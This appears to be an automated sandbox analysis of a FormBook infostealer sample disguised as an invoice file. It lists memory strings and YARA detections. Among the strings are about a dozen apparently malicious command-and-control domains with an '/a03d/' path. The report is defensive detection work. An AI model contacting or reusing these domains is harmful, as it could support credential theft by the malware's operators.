Source: explorer.exe, 0000000A.00000002.4492874400.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000000A.00000002.4492874400.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000A.00000000.2056890977.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000A.00000002.4490737817.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2051156974.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488140180.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Invoice and packing list.exe, 00000000.00000002.2064262392.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, utlAHqvw.exe, 0000000B.00000002.2097300869.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Invoice and packing list.exe, utlAHqvw.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live/a03d/www.kkkk.shop
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.liveReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aportsystems.store
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aportsystems.store/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aportsystems.store/a03d/www.oftware-download-92806.bond
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aportsystems.storeReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.argloscaremedia.info
Source: explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.argloscaremedia.info/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.argloscaremedia.infoReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.info
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.info/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.info/a03d/www.aja168e.live
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.avid-hildebrand.infoReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz/a03d/www.otelhafnia.info
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyz/a03d/www.gmgslzdc.sbs
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eepvid.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz/a03d/www.inggraphic.pro
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gmgslzdc.sbs
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gmgslzdc.sbs/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gmgslzdc.sbs/a03d/www.aportsystems.store
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gmgslzdc.sbsReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.pro
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.pro/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.pro/a03d/www.avid-hildebrand.info
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.proReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itiz.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itiz.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itiz.xyz/a03d/www.duxrib.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itiz.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ive-neurozoom.store
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ive-neurozoom.store/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ive-neurozoom.store/a03d/www.yselection.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ive-neurozoom.storeReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop/a03d/www.ndogaming.online
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shopReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ndogaming.online
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ndogaming.online/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ndogaming.online/a03d/www.itiz.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ndogaming.onlineReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bond
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bond/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bond/a03d/www.enelog.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bondReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info/a03d/www.argloscaremedia.info
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.infoReferer:
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yselection.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yselection.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yselection.xyz/a03d/www.eepvid.xyz
Source: explorer.exe, 0000000A.00000002.4503299430.000000000C9B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3094004132.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yselection.xyzReferer:
Source: explorer.exe, 0000000A.00000003.3095507366.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4500945096.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2066553176.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000A.00000003.3096506501.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2046314604.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000A.00000002.4492874400.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000002.4485377091.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2046314604.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000003.3094432108.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483686089.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2043805093.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000000A.00000003.3095073919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4494783707.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097484766.0000000009C21000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000A.00000003.3096374174.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4494846370.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3095073919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000A.00000002.4500322845.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2066553176.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 0000000A.00000000.2056890977.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 0000000A.00000000.2056890977.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4492874400.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2099537926.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.2123422018.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.4482139212.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2065480550.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2065480550.0000000003B96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.4504401224.000000000F929000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.4482595547.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.4482552802.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2109123582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Invoice and packing list.exe PID: 4424, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: utlAHqvw.exe PID: 1856, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
